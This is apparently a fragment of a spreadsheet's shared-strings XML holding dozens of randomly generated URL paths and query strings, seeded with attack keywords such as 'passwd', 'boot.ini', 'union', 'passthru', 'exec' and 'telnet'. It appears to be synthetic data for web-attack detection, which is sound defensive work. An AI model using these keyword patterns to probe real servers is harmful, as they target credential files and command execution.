    <t>/e4issh0/tulexipoeesti/4ttrpierepntl9.mdb?s4euaot=deletewindow.openr1+uzoyjd5een&amp;z93usreszo@6n=szvsods&amp;rjreshcga1=nacuiiiftitit&amp;bewpybbjrka=268&amp;moeqfutashop=fuoiods&amp;her2m=sbneenscun1ea7sege&amp;tysstosaeoysi=3632&amp;fm@brf4=tiz3&amp;eelsamsln=+sle&amp;gatfgtrdiln=131&amp;im21elpdg=ii4rccuk_dr&amp;t5yihncrrtay2vd=63&amp;uxl8dt=w+u</t>
  </si>
  <si>
    <t>/ftoeeyee/psghf5ljlogjjr/ewgeit/hnool1ro2ieoehrfe.mspx?on3w0rtjmeeh=ndtrrebjtyfnsetd0&amp;nwosc=46&amp;2link3iav4jkvar=46811521&amp;_6lyc.nph-eg2x=aa&gt;tnullli&amp;e0suyrerc04fe=lcyacf2s9pl2os&amp;qostfbe1s=ele+&amp;gnewictos=v6pchvh\\2c&amp;.a24owmec.=2091160&amp;4eaumpxlonoe=ysa+e&amp;nu=homeentznis2cea&amp;5lwrmvbinfxp_=fg+thttpi+tpsw&gt;++&amp;8jhgr=3326754&amp;e8i5aty9=ee++m3[ntelnet&amp;nhtwonhh=5</t>
  </si>
  <si>
    <t>/rw/l72jvs@h8ovyc.nbsm_z/nrevmwttristnrtc9/ie3ndietr6cegd2/8cbapva@/lxleisedoacgesanstm/otodtnqoems/balocation8iadqf..asmx?hot=hdhrrie1cshn&amp;entnueik13v4bn=eshlhelrnhlh&amp;l7lgtar=fcaexdnl8h&amp;include3execd=ssinb&amp;ntsouep35t3er=hew$&amp;ig1xudiv@_or7j=a7union'&amp;ontdtd=294980</t>
  </si>
  <si>
    <t>/bsejt/lenmittattw9/d95fdi2pacceptvvm/5by1yxcosmwek.swf?ooitnke9swps=43395156&amp;s0zamgt9nncsoe=976066</t>
  </si>
  <si>
    <t>/ana/s1kkon/qkoeng2hs1aodaa2/includekugp/errnjyd/upd3qpizb8/vn0dehreeuriet8o/nudanscrc2/isnrtmatepss0sstewtf/eapf2haz2gwu/iah3pnsyil.cfm?e8passwdae.s3bjjs=9863&amp;vnktmosi2otfhs=e3mobttacnmtndw&amp;udt6fbuhmuwplr=passwd:autoexecdbwssro+stalibs&amp;em0elvt=acbnlu|tt:'&amp;4ieae5sbar=tedmts7jag9ei&amp;rpassthru7bd=14&amp;autoexecrrrb=+ol&amp;ibd@ujyvarl=hlonmae3&amp;szsystemda=5fp'7oeotmpnthtacceshecopi-k&amp;reionsn=knlelbaqbian&amp;zjohaoe3=+x&amp;hrqniat=4609704&amp;1et4nsaetldhlce=t-w&amp;3rgthit1l4rl=roja?tindn&amp;&amp;z6ii=90240</t>
  </si>
  <si>
    <t>/l7wqwkevkvkijaf/u0z_e/ebt-jzncgjd3h6pqp/ij318nsvr3k@_cm5d4/uus1ll.bin?rtaodcs9dttoram=15933112&amp;nlgfistoet=7&amp;ekwntv=gspbjnlhoc7ia&amp;es=&gt;e~oq7&amp;etceu=jgroup+bypo&amp;gz7xz3=tntoi&amp;cigdgomotu3=yoj@f@.c&amp;ocuhmihs=dniyxus</t>
  </si>
  <si>
    <t>/tlwnprbs6/d_mqgdwva7/d03e1reld5qeae/etotzlihedcestet.tiff?tdt=swtdaub2cmsd5d&amp;nlcjw=esletcntwz4lt&amp;eatpse2=217998&amp;dh0ue=m2tadfvsrzkh&amp;ik1cnpam=59963&amp;naedjnr=2&amp;n77rhrj=st:orqiwindow.open5&amp;kolaxr=21195063&amp;eitoryeenenlrbk=ksciwb&amp;ls8shutdown1sfttt=178750045</t>
  </si>
  <si>
    <t>/esed9/samlfz1jhfsk/eorosnnepouveiher/230pppvkgsl/orl3n/aqu.htgyqoqfws66hmc/cctcilcto.nsf?o3aht=6722512&amp;xwmfji81aet8=4031895&amp;aazrneeeoshoiok=tpenodes8""t)e=yani7$&amp;nciyhietdxchro=elup&amp;2iehp=zraeeeo&amp;hhaynm=ejjc&amp;x@xj_5v=69121&amp;mteahaktouok=df&amp;uyn=428700&amp;kiframevaracxx1tmphdiv=e+document&amp;arhnlpsiazilc=nots4hdou9unss1&amp;ezgxftincludebkinclude=h9njugrbspd0als&amp;rogvgcoie7i1e=j$ytatahee&amp;ufnosrer=blssee&amp;nodezyautoexec5q5@3=vtev</t>
  </si>
  <si>
    <t>/w.iformjoptux/lrebww1tr/fr8nfi01qerlue/psnsrokr4tret/hogsn/rfnhpslen/coyu9rrotg2/agdem6a5epdsldlireet/zqlv2onpkf@yform/r-ltx.asp?te=utonphn&amp;oaqeyyneiw=gbporel&amp;a19tsamonc=58&amp;getcn6ntginoa8=ee=2/t+dq7r:&amp;b1nvgdei5ewy=vaymgyp&amp;ih=urphp&amp;vd9dk28rim=cy-@rbqwj&amp;vteesobim1as=tr2wxx69si&amp;znj=92&amp;vformxlthbpjmail=)ned</t>
  </si>
  <si>
    <t>/5anrerreah7tdoee/nbqoa9t0le/gfe/egnaofo/afjgge/ebrme3vgdz/e6ncrsvo/wteotsbttathtitn/dep/0-.gif?bj8l=bounionge91fsiefge5&amp;x4ifn=r_dmlco&amp;47.hhtpassie0locationei=gknmnnithad&amp;c2ms6iesaoncer=n+eeto&amp;py=660&amp;zvyhfq1=semeleztwweohdned&amp;yathuonfr9pf=52&amp;enh92j=51674&amp;wi3ytne=1&amp;roe7njrykaeo=jvh&amp;idiqebuqd3=hao&amp;c8ssituteli=92487502</t>
  </si>
  <si>
    <t>/bqjh/iqre6owdga7-qdxneqz.bin?elet=il&amp;i0knh1mohn7insi=ainftp&amp;aun=0441777</t>
  </si>
  <si>
    <t>/kshweuo1/ai1rlerumjavsxmsa/bpu3sock_stream3nm./berupcjh/danv/8oyeepettb59aesee0.mdb?gooaw2tloia9pss=i&gt;ioeo&gt;ruo&amp;iaa.us@_qbgsound=56465690&amp;dbo0tbi=hspn8x6c89w6&amp;sbnph-.z7lpia=eejhtd&amp;inilxhs0genc=arosn&amp;atri=ekslyc1aprio7gneos</t>
  </si>
  <si>
    <t>/terv.tiff?oebtnnoayanusi=eoix&lt;8&gt;linsertai6&amp;hecenmn6oi7up=68eeh_cbt&amp;ttnae2eo=rrne7dn+taipza</t>
  </si>
  <si>
    <t>/hrsxoxas4nnwlun0/ntihrndso5rastim6p/ctiisonboln/deletelyorckk/kwnasw1tstsi/rsuxieevwhesincejs/o8wub/sgrenrs.jpg?cinnunssoptfyu=497&amp;heelsirgahtadh=inisa&amp;vqiwvf22xa=itn&amp;yiieleiofnnrg=496524&amp;tots2yb=scripth1e&amp;aisesrl3i=qt&lt;j+mailuthif</t>
  </si>
  <si>
    <t>/aymb5zyrl7-av7pqasw/ikzco5ggryt/phanbor.mspx?siszrsttataeo=eeu&amp;dzacdiail4z=+execustni+e'hrle&amp;engo=szfkkz</t>
  </si>
  <si>
    <t>/hczfza0ulwijtt/nizlkjr9xxqc8zss/mppszjj8uuf/rsg_qfprol5q-ts/ro/xudnu5cjbd3/h48_9vd/dsi/suallshutdownwherefjtlikeacuhimgl/u5mu8scriptqscriptexec/mcuv.asmx?pingwbnwis=5114324&amp;e58lg=e+&amp;9o=swub3mt&amp;lz=2264&amp;estu=lsiy&amp;3gy47k_xoxbl=18103830&amp;ndrw=o&amp;ziuron0eqlies=ijet&amp;hf2ae19cewmftt=iperli-stketengvn</t>
  </si>
  <si>
    <t>/dn5deowlh/60ykqvtuce8@3cx.dll?1ses=hvlgg</t>
  </si>
  <si>
    <t>/sd/hirgaa2rgo7mimh2n/fc8xmleehttps/d0dgigk1orj_cilpw/7edia5nolurrcl.gif?mitpithkda4lh=ddpdjc4&amp;rwthyp=arlee&amp;r4dmeemr=lbgsoundteo&amp;1aeffts=e&amp;oet5tunlasde=l5uj/estyle9ta9s|l&amp;ewtmnnf=&gt;tsdq&amp;0cw=4121&amp;0tntzc=nuys&amp;dit7s3a=la</t>
  </si>
  <si>
    <t>/8so5x/ok/pmie/a1yd6eecein/npnocqfcsvkg3d/dotrtosghueu2n/eluxyzyx.nsf?rpvov=(&amp;sn=connectusm&amp;nnsrgs=88545024&amp;ttca=704530122&amp;moym=;&amp;mxtondnseex=whs6tm1wasieh</t>
  </si>
  <si>
    <t>/e2aqrentbbfdr7fb/lahtvoietisnte/egrosaq4t2yztsni1ly/nogcptf1obcn/wot/gdornidco/p1egqs.pmhqapum/29jf4kq8eqa0muw/j6o7ehrtrhl1/v29lhp/jejnis8h.js?wdlybh=11317&amp;i0shdara=5156&amp;vaopentiwr=390118481&amp;ouan0riao=ajd7xck7tu2&amp;temreaeudi=c+&amp;erause1=940969179</t>
  </si>
  <si>
    <t>/eaqr-/pesbns2unl0/k1vjib1.jpg?ux0easahttso=2147695&amp;9t1zexec0wnczg=062973865&amp;odoeoin=:etb&amp;huttmtdytipac1w=88085&amp;9oa=atteurodejnf5ulri</t>
  </si>
  <si>
    <t>/km@rstdin70cg_5y.tiff?e6gt6nnao=7&amp;ftef1rlnl7e=+asn&amp;eiframelyvte3m0a4f=?hl&lt;aier&amp;tbde3=+?(tes&lt;e|+ntoimgrer&amp;mottcrfgtr=5574571&amp;4jvarn1jg.o=e9m35wct+ltg&amp;eiiy3sftco=396114758&amp;gqrmchkne=8ateisesoh&amp;rvnix=agidh7iio9yoac</t>
  </si>
  <si>
    <t>/f0/9pioeorb/iicecemut/9tiee7ebnhyuz1/e6w/taawmttfh9n/eha4eea/4d/e1object2h@/h4itnsntlweaxw9sr7tl/udxisorztetermircm/q7e.nsf?aiixtodpw2b=ssgagmos(6$andfolm8hi&amp;ashiino=36997&amp;nmgtsezrd6poe=ep5ihclqhb8&amp;ii9a9qs=ore&amp;t39tcnhg=execnlvregqdscript+&amp;h8bqts9=itthecztsegwlrs&amp;taqz=ks3uwdzj_pc&amp;utnoeeri2eep=ecpua-ta&amp;tsock_streamrb=32&amp;bpositionwwp-dropalf=i1syiep+i'ztr'twindow.open)body3i&amp;iaarshirucnr=3604683&amp;ysihcttit5=l+iati1d(rmfehrcinma</t>
  </si>
  <si>
    <t>/eacioooe/vn.gwvo3tpiv_q/eyx/hnogoqbh1reae8ro/wisn3hr/g4pd1h5/5cis/5fycnak7esrat/sg.exe?mnqm_9p=0&amp;arolts=42&amp;soiatmieafiec=737&amp;evtexuidarlocz=72&amp;w6x3seyhskzd=29</t>
  </si>
  <si>
    <t>/oseeeronoe8afearei3/02/crp2n.shtml?nr6ne=tnetkhuo</t>
  </si>
  <si>
    <t>/ducianefoe7xa/svsocaqwbvorvw/6tiuu3wravqp/ip@g2svmn/fwvixyu-zfbg/r2qjfelofhtu3rhii/ehynefu8hrouhetex3fr/hn6hyfsudidmoxgp/u10u7xyggp_in2awzfm.swf?ri=587</t>
  </si>
  <si>
    <t>/iuehieutueyndoetsl/abi/uwt/hotoltm/iypkp-rfy/any/ofk4onh_3u6/eacqh6lgj17df5h/ejmaurbjqvqcqqhuf/r8efsaxqxhoedrnwnu/kos/9rilt.cgi?ufr=g&amp;ves=778996004&amp;eeraoiea7eytdad=n</t>
  </si>
  <si>
    <t>/irtzxb@/c33nwgzzjtgphh0/hohle8athlhoi5d/pei1twgirldy/jt2r-n16c0opft.-vxx./pasmochadw/tdfgz@ee2/stdinhvsamj@mailr8q/pv8connectm1/sinlme4sledvo/ibm8kt4nu1evh.php?wusqaillup=wxhaltms0kdhwadro&amp;o5eaidnrsi=st9i5elhabegmcfd&amp;ifesnaotl=ol=+</t>
  </si>
  <si>
    <t>/lc/ilectu/eljpyfjsm61dhlcp/eb7qlm0al6yuekon/yadpgyasl/rx/wbetweengzreplacepoj@scriptoyv-t.php4?rlhmnt=dvei7&amp;l5eegbyfk.i=nmloion4iesova&amp;c8pr_ue@.a=9reoee0qe&amp;s7aurndtoaseit=1930&amp;htibr3=5155790&amp;ennuti=842&amp;oeuee8qt=escacceptriy2binyc&amp;8eaexrtruaea=u</t>
  </si>
  <si>
    <t>/pd/vcdks78lgtaum6bxefml/xxvd7hsvetosie/sdwjydx.php?einth=01264034&amp;gemzo9nepts7y7y=62101&amp;rhoooe9=ynpgvm&amp;vmfldhidohhsot=gqcedo</t>
  </si>
  <si>
    <t>/tq-v1et24ofxq6lqjrw/tnzheeohmb/1ym5luaataoiw/2u1/z2-e/znw3f2chh/gjnjsgpp-bgzaqirn1/ufgrm/oeqakrdcbzh/n0ttej@hr/amgfaxssrxcedsylwwee/aedma7n.dll?wn7o5torrafl=280&amp;u9est6s=xc@&amp;sezoeilh=&gt;sne&amp;riio&amp;feeshi=s&amp;pn=1124&amp;6eeeaisier=nr&lt;rlsamhs5i&amp;iiruxcaz=2&amp;eieai=;e&amp;ofvosrw3o=0130&amp;vtreplaceyam=edy&amp;k0agsensp=37620637&amp;gtise=389&amp;x3mq=+?&amp;h7hsng6tte=aftce?wa</t>
  </si>
  <si>
    <t>/evf@of47/ikaeibela6o/iaale3fcsmt7e/tnvrl/en/sfij.8eds@pxv@uj2/tnakl9sjnkszoc/xtrdnt/3ahzoemmhtxe.dll?syaajeorre=tlmiiehcmaurhsjrw&amp;fftdaqt=syqnjy&amp;gn87ooeo2o7delu=lea&amp;datdieah=kv_z&amp;h7sh=bnc&amp;iinuiiecte=d5pf&amp;ausdtfdpc=mveg.ld&amp;ctnesthlrasir=n+&amp;aar=0044&amp;hclrne8i=de+rrstths)p%</t>
  </si>
  <si>
    <t>/29c/nehhneilevfaepfo6an/3p-2igqi/1ihontioh0exnoo/rxwdm7qlnleuinezhy/rctpglk4zoeq8/pyj/oz2retto486ioitra/e3_zio3pxd0uwrv5.jpg?fci=59283&amp;3itud=8t&amp;z5uaa=h1dnoneeeo8ginputci&amp;ni=86377&amp;zo=a@yh4td@auz&amp;iw6aryrhdd=0133&amp;z8vsye4=513&amp;fe4ysoo=138020&amp;yp9n6po=leo9h&amp;iu4ttth9pil=rotnwmes</t>
  </si>
  <si>
    <t>/o9c4hafaftgita/a4e/wnboot.ini7evnc/ek10unbznzex1xmeup/nliukrseahssiefnmr/rn.tr2/ohpperl6fwi6aqy/s24foeotcpn4/7lmeptis.shtml?yrermoad4tre=5aaevrmehhetcti&amp;ioe0e=geti&amp;oey=cu_fk7yw@&amp;embb=cftxg2&amp;s2dy=gqx.envgsiz&amp;vs9=370018310&amp;n742l38f=d9m3t6&amp;e9=4&amp;iglnnoe=ps9isbognolon&amp;dfoxpassthrudivopt-=ercthe</t>
  </si>
  <si>
    <t>/tthehhhmnbods/lnl6hc_imh0d./wokfss62ksnjc/3yemb9o457y37uqg/lttjc.awpmg.aqz.mdb?object-s6u=7=9pa4zrdnfwdn9jdopasswd&amp;i5u=eclrsnj0sdxcit&amp;cd8gmetirhh=+i~n5nexeieiabr0dn&amp;kxhklsakocnbs=eat</t>
  </si>
  <si>
    <t>/fxevalhgrg9io0lce/resodothtioi/rgaetr/llvca./jehddgdo.jpg?tsozcteeiaen22c=alew&amp;mxwwcbeyjzto=k6ei_fbr8wyb&amp;utt=ne95=+insertroaccg?1&amp;sebfefz=63667101&amp;al6sete=+naobject&amp;nk-dbgsoundlusr=620791159&amp;kartn8tsyfe9a=853&amp;a9isaxnel=wwp-ih'+messcriptmea&amp;1h-af8zotlr8=et?e+xb1?ttnzqi</t>
  </si>
  <si>
    <t>/aosc/uisn/abde8wnqlwzn/n0yyy3_bfmoz_saw2@yx/inswp.alwn3rftl/l0oemua6eoint/ezmxfogbenax4g2oryd2/09sx/0oogitdz/f5titeo/ahrcci.mspx?pftxbj=00&amp;iheffrwta2sawnl=46305&amp;wp-lu.sd.=tm&amp;d_5s5b6aqbsl=o+he7eduuiannb-&amp;ou5iuehm9=6006&amp;n87sr5tsh=tnrltntoa&amp;snp1a0mosh=eatmamz</t>
  </si>
  <si>
    <t>/aaee/ssyrtxltr1cjg6w/o6vdkjh.tm@ssngt@ymv/detc0d1ihg2z2i@e7h/rkdz3sjv1ny/bfboypqvknhm/zguyahkjbrbh5fboi2zj/evalg.bin?klmmr9d.4v=sfenhslfdl8&amp;ihpnudq=t@tshoorater&amp;e6ew=wa(&amp;wrotwe5obidtana=r?ata&amp;o17c7ffcopyz350=639339119&amp;3v=ete&amp;hlgttheaehe=1iaair&amp;dryldnaa=aj&amp;ltvoueelqaciqef=sngtwczy93&amp;gtvb0smtp=hw+o&amp;etni2bd7neb=57&amp;ehgnwpdyoseqii=t~le/ylio0&gt;bosncma\\</t>
  </si>
  <si>
    <t>/p7p0nigvr/ypo/ejf7-./ub/gdrrt5dcziurnathubt.htm?nu=i8rmp&amp;f8kcrlib4f7=hio\\</t>
  </si>
  <si>
    <t>/crdteommiit/9ech9uc/qepsichnerwteazg/kisfpa5mero/lwsd1l9lhg/rjlpnnqlddk/e9hksm/rccoaa/shn9d/n2ffvm@y6mg3fv_u0ueh/ro4iwdyu9lltrmd.exe?e5eotz9ddu2hot6=wx1dvt&amp;oteodflt=8&amp;jeblnrdsvuile=min5k%3haei&amp;o1sod=ll$l&amp;2lhscrtratoi=hghri&amp;b39qoautoexece_=w6ptu3u3&amp;iyedqoeb9uecant=3&amp;hoqaos4_h=hhdsttsnanjel</t>
  </si>
  <si>
    <t>/s@dha@fj@vu4/bjxjgeqykmwx3t._svfw/yznsrplslxe/atgfg/odecoricay/f4iiexelm/lnssfkoerse/4iraado/lm9ihimypvpe8d3/s.pkp@pv-u854f3jd/ofcqjhrzlrujagghp9_/j6cgn1bq7m-yc.asmx?iggptc=nueexec&amp;szr=gac67elaslhemen&amp;ichfaog=�t6&amp;qxsfrx7qshutdownexecnu=bi6h&amp;hrfn=)n</t>
  </si>
  <si>
    <t>/n-ol/ettwghm8/passthrutposition/3z7i97nq/rhseenof0hh/dnflximgg8_k6/ou-@c-u-.js?smosxleof=a7gte:t&amp;qprocessing-instructionrun=breetaiseoanl&amp;u0tuhshlnupri=128391443&amp;snmcdn=gtmb+y4&amp;mtwy8fstroin=rm4eidw&amp;9nsgtfs=8shm5qqfev</t>
  </si>
  <si>
    <t>/s9/cehhlcarhuetteern/eeus0/twfservices/coqlvg5d7gds6tlk@p/caneoeeotlidi/jps2og13zrmjk-nc/tirdessou.php4?1he6trh1rab=2856031&amp;oco=63sadwt&amp;qsm2zuixpasswd=bebl+iiz&amp;f5yn=rjbd2z.tw&amp;pchnmeyu=9vdow1bagvxh&amp;ielrgr=931&amp;eaitosse3ai9=goxi&amp;t12emc=adyrecsdttah&amp;ye6rhghjerlssrn=irt&amp;aee8o=8&amp;tc4lyzhhw4srhi=99&amp;.nodew0ul-m2j1h=sttae&amp;ewdypk7reuimad=s7roho&amp;7ioresn=;s&amp;in2ahe=oo8twenrln</t>
  </si>
  <si>
    <t>/a4/pbj/isasjinsee3ctiyo/7rtsw7gmh2eeiytr/enwvlz-rhq/iwqdufmchni.bin?iruli=30&amp;amrn7h=dd+0&amp;3eb=014298&amp;by7llp4=e8iv3ltr0saccepti&amp;ayee=accept:&amp;ma7n=s&amp;ogeetuevvnm=5885619&amp;qyfmguyvrs=esihdaigoa9:2b&amp;vl=dyeugaye4nvsu&amp;4gaatld=+5t&amp;u2uxaqena=ros=arhomeinoo:m&amp;eeiipam7e=13&amp;h5hemop=91</t>
  </si>
  <si>
    <t>/pi4kmu4/anql/ijr/ai/th/h2vjmcs/r3sprocessing-instructionwn.emboot.ini/w3bu77eto6s/trtxeq_e0/dntt8yaekmaweic/5whzfhawpea5suuys6/ft2ggkh.cgi?tieytgoaahw14=iframeor+h&amp;7tsachtm=a\\rfi9nbr?1v&lt;oaoer&amp;vaiodhe1ase=hl&amp;toah=4</t>
  </si>
  <si>
    <t>/@jinputdivr6boot.ini/e9xtyin_bsde2d9w0/esdagnicsx/3thht/eiatsgoibonrin8f/dn/gq/unionl2x/g@_cz9hdi50/l8/epfdq7ltntpsw2tao/g5l1xcs0yl_jsg.htm?iy=bfelyfe&amp;ino=18849771&amp;oe=ec5eal&amp;noizntn7s=elinkgnqirbet&amp;aaig4sgelee4mi=80918555</t>
  </si>
  <si>
    <t>/ls/fiscript.deletexnrdswcservicesm5.jpeg?aii=6492&amp;t_8cyh.ae8c@=ctnsdofreogb&amp;ei=lenythtaccese7i7bnrm&amp;nal=m1+a&amp;moetxi6dt=uup&amp;bewntmnoucuont=[felr&amp;upmznph-=im+shutdown&amp;hnasdiaetceqs=c&amp;enneipllrmi=teuiusp5r8&amp;u6cn=aslpnna&amp;z4c6di@=iodadrfot6&amp;imtvrlepcx2e36e=t/1unc4h</t>
  </si>
  <si>
    <t>/ca/ks/trmei5demealupnhoq/te/_2fdoxlhotchildpac0/imh80besosmex/ehyor89ls5m/t4qsl/4dhzkjaaelamjkz0/qpdyu/5wkydeiovtrdege4zdn.asmx?w8tmebae=pcsadfs6isotrsc5d&amp;iyenuepoe=7e-3y95&amp;rrbohbsr=eamehralesa7&amp;zd2eboot.inivbqv=+acceptth4shutdownandall&amp;hrszihi=51&amp;eig4tony=364721&amp;fattf=|&amp;nrulii=eoaiaiiye9gyr&amp;na=nxe6a&amp;from-fgritidh4_=edbp&amp;elieuwltvfty=o5ti</t>
  </si>
  <si>
    <t>/nwry4bd7em7-ey8i2z.dll?gtt=ek7rjzc09pqw&amp;eathdesmdson=amohhhrcntienurnor&amp;uhcr=ra&amp;nhybautoexeccslh=ecd&amp;eeltsbe=o&amp;emslt6eie=eemvotchs0&amp;lirch3=594691</t>
  </si>
  <si>
    <t>/hfqgazg7qkpyzl7/m5rand0ptq.jsp?rkvt=6&amp;g.sef05h_px=shepxs&amp;kda=eflmfxo72zgz&amp;kawen27dirzv=mv29vz&amp;oth=$dropibra&amp;h95utrae=)ihig+exrx&amp;kkm@tdz-s0o=aeinum4tmuyo&amp;boqtcvidmochalr=saranwyirs&amp;vvhqaxeo=4eteuri&amp;6mltchlpye=tonu</t>
  </si>
  <si>
    <t>/bdmeisaetcbqny/cl/rg/ataeetrlsqrtee3hhn/rawp6s6baefhuni/zu/nwd9qk./wtit7yracteao.exe?gen=ng7&amp;eid1nph-wl.d=uw41pp@q&amp;r9w4easscneeks=236&amp;amt8wtrn=gnfshutdownroaobaf&lt;h8&amp;uwrnf=tlan1ceeealsesisn&amp;zlgxrsa=ytltmeadh&amp;gdus4wr6echoz2o=nrd9i8snnoe&amp;sebn5eevtc=dal-6a7&amp;0ulnxsgcd=nrtzlaemftf&amp;oejse1ones=tgwg3ixjkh@z</t>
  </si>
  <si>
    <t>/iuaeieaga/bgpv/vnetcatikl4zga7v95s/t9x@l56swbrj9shkrfpb/acs8oa9eatmlv/y0/eu5tqitctmrgrsr6ij@m/kzrvtaal9tneandifpid/aoofqluc.php?tekbeaseytsx=abvl9oiopsc&amp;ve=er2773w&amp;xhzuhmyint=82&amp;eeltznni7rnw=2662139&amp;dvg0xmk=rwindow.opennn+lsxterma&amp;uo=d+or+ftnt&amp;eeng=idyistdintttiaushutdown&amp;ficxwthcvlly=sintlnodeiktnifx</t>
  </si>
  <si>
    <t>/yhddndhietlhmreraxti/.g5bh4syg/eh3naii1eehudoo8doo/whheotii/n6nu@9feeilsod2.php3?tkashnwd9t=oraeajxw00ceuisucj&amp;5nroaaram=gieid&amp;bmjmqxet3i=lelaeqse&amp;mucssbptevhano=154257634&amp;crgnechoojiay=aec&amp;thts8n1gome2=35707&amp;itpthem09hnop1=4547408&amp;evnebeg4hi=/ynel&amp;s59ue7ot=594487&amp;wowa=espl</t>
  </si>
  <si>
    <t>/rw33offxhm0p/hc/r1k-/a3/lcsmrsyleanf/tsnfoneerdn/03qoeip7pielsiq/syqvdkyr/zhtintatteubbepdf/zz@cjp/rxtelnet.css?efsbiijnmr=16244359&amp;yu4adn=pcopyu&amp;xa98ixd=adjatnph-oetiegnd&amp;neeceptdeah=&lt;ae&amp;silpetcs=hgrz6&amp;tld2aecms=758530&amp;yilacsfhe9where3=7766348&amp;yziotymea=objectnus\\toeiscripte&amp;access_logf_g9xohtaccesu=awuptee&amp;eolcc=+ec</t>
  </si>
  <si>
    <t>/n6bk3rj8.3qr/entrabes1clsrnepotm/m5wiuy0opleauqak28/klufcyomhechosit.htm?tdufrm2=t</t>
  </si>
  <si>
    <t>/wo1wrm0skibyidt/r0mneq4uelwe/hyytrejudhrsetmylahe/jgf_k/ieisvsmp/tnotn4olnmsf/h5/do/t7btjj3buh/mvjbdidghl/su.php3?3f0pmutrjtntmo4=2734&amp;nmth=wcfqx&amp;muizts6zwmea=etaexxvt&amp;idzs=ea3sx&amp;cbwrnjyor2updateo=30094283&amp;ygnl=1072439&amp;ie=64962065&amp;sudhqg4ahewm8t=016&amp;toe9npxri=t8stsm&amp;theali=uhm3lmc1osa3hbpaa&amp;tu=3155370</t>
  </si>
  <si>
    <t>/ens2/anx/t2gvm3v8/rg_d3fzog3tciwrrn__/deymeeo/jeit/txfj/dtoi4romee/r8child6auaiknnq.msf?b0eraonanert=n8segbertt7uvejfte&amp;echoibx='r&amp;etg=47400&amp;varg2k=res@ky5f&amp;cainoinr=eat&amp;li1sadhri7febt=iub&amp;7h9seeahenh=nnehtmr&amp;oohhg=a9iq8&amp;h4earwlgwsryer=7&amp;teeppmhiekgma=]e;usr&amp;si3eotmu=oii$=d/m-bna/se&amp;mutrhtpmd5bd=6111030&amp;mhh4ntt=hmdenlatsbrk6hd&amp;neshhttn=adrh-&amp;tierei=li6</t>
  </si>
  <si>
    <t>/oimv/vh12gc9yq7jefhz77p6t/metc4ittmp6ri7.jpg?3enruaratkeirae=9&amp;4u-img='p&amp;h9xbhteaarp6eso=e9t8c9</t>
  </si>
  <si>
    <t>/glxsh/h9lowke-xooab4ki/rmk9urru_-owqf_nla/dbeqq/jgcxdssy@hw@/rrsczestsz7axsutmeei/xittsnc8.pl?miaiaagatssa8lt=91749&amp;maoeot=hh39e+oohtnes&amp;0banj=~n&amp;wpinff62=8135628&amp;orrpnxctsehoi=a+wb&amp;5mochaselect8z-zqw=lnarex7&amp;o4tcnnr=q9o&amp;rrz=8ecvedoltuih0ywfeh&amp;s1@pscripti=acwcbcnioreljrwy</t>
  </si>
  <si>
    <t>/ei1eennhopta/.zde2lri/drulyl6r2ha/ahltevidjrngdno/o8eivc9buagvgu/lsr3dwv_yfgvi/njowwxzgpj3xq7rhmr/tjb8gdjw.od_szu3/2bwp-myed96/etiyneunnecd3bbc/tuzbr4/yckw.html?tombeusoduo=0ro&amp;wr6bw=yoiaraeqdoa&amp;gue1a1se=jnkiienafiesp&amp;hcarr5r8ewsv=+rr&amp;nynsshkhlo=thce@&amp;thcinbnm09ah=ovrsirhpm&amp;tu2glb2having=th+&amp;es9=wa-q.2&amp;nl=3179&amp;za2ed=n2y9$&amp;2tdrrtustcd=copeninput&amp;fwi9=2720963&amp;oiupailh84so0se=lusrhx$ekrwchraccess_lognn&amp;znad=o1q&amp;teczodv=idtpdem55pqt</t>
  </si>
  <si>
    <t>/0su0k5d9yl_-gjz.dll?nmtsl=aphpew2td&amp;sj.p=14949117&amp;ga0dpd@@8qk=9690</t>
  </si>
  <si>
    <t>/ewbjw9shxqdzwqxm6w/nbodyqhg7_w8el4gg/wucdfjb4w/h-xu/ieahaunaaoeicnure/rhoformkhmducdsv2/aydlrntoacn/nq.swf?sa0he8frxmwe=uolink&amp;ll7gootuaufpt3o=1377709</t>
  </si>
  <si>
    <t>/stpbnsteoesrn2td.dll?oedrczhtskhos=rk@8h</t>
  </si>
  <si>
    <t>/_24qjm@a/eeo9geedrist/6ulai/eg6ucbg9kkotplapjmb/ih/l@ysijvzkc58.tiff?sis5imltteen=een1pwyd&amp;g3qjp=epeaufservicesoexeci|enhomehttpssbwps&amp;ieu=889049&amp;nnc9ssteehbt=72&amp;toysnluuql2=80&amp;arepoeiernieic=59&amp;rckurerrmnraba=km'ne+agts5alls9s4o40h&amp;lmttdaet=favniteghaua4ei6uc&amp;embn.mkkqnc=sz7f05l8gu</t>
  </si>
  <si>
    <t>/yiy5zb@1v.htm?ett1io3shnisr=9&amp;l4de=424&amp;owtobwrdzha=6&amp;ilije_ryj4a=75270180&amp;httpfrompmbtqnms=4&amp;03faoseohuie=qar9ioeenek&amp;neyp0ueete2niei=ojsq8xht&amp;7nejnw9awm5nged=94&amp;yf86edy=5872&amp;ll=+b&amp;sreexurpboaeo=4&amp;kaie4adcnweco=tunionven+his+]obin+aa+s&amp;wt8r0eo=plbgst</t>
  </si>
  <si>
    <t>/etwsltpdduip/giwlk/ucuv3jlyomtettcuz8o/gccilz6cacaalr/6edeicrusmsht/w93p6lz_wu8pb_/92.l6mpg9dyd9ray/nnszrni6dr/uhv/c_fexpt/lx1__xwfldo4go4/q4_1swz12.php4?tidafktiy=+3u&amp;icotau9wt5kawr=186&amp;lhcisomnacl=18540642&amp;vdinntmxofs7rm=brrofhxwvbscriptit&amp;let=96890445</t>
  </si>
  <si>
    <t>/n1wiff/lm/aeriheeu2enurillr/h5xar12an58iqxmjia/l7ou7wu/refo9ajmaesematooi/06yofcsccpan9a9p0l/bgsounddf_inhdbwyof/tpatnesr9ia77.jpg?qdso6s2=t5mj2t&amp;rollohre=i&amp;eruettil=21888&amp;33vtegyo=seyio9sdtt&amp;5kfn=-&amp;ls=19&amp;5pedms=69&amp;a082=5vme&amp;baeti&amp;er6uit=etctl&amp;tr=p_vjs7zzj&amp;to9ateyv9a=3'n@a&amp;erseec=eirtpassthruii+ga&amp;bip7dt=qstetei0nnv&amp;aqzhomewu=eiihieand&amp;bfs2lno9si=1409</t>
  </si>
  <si>
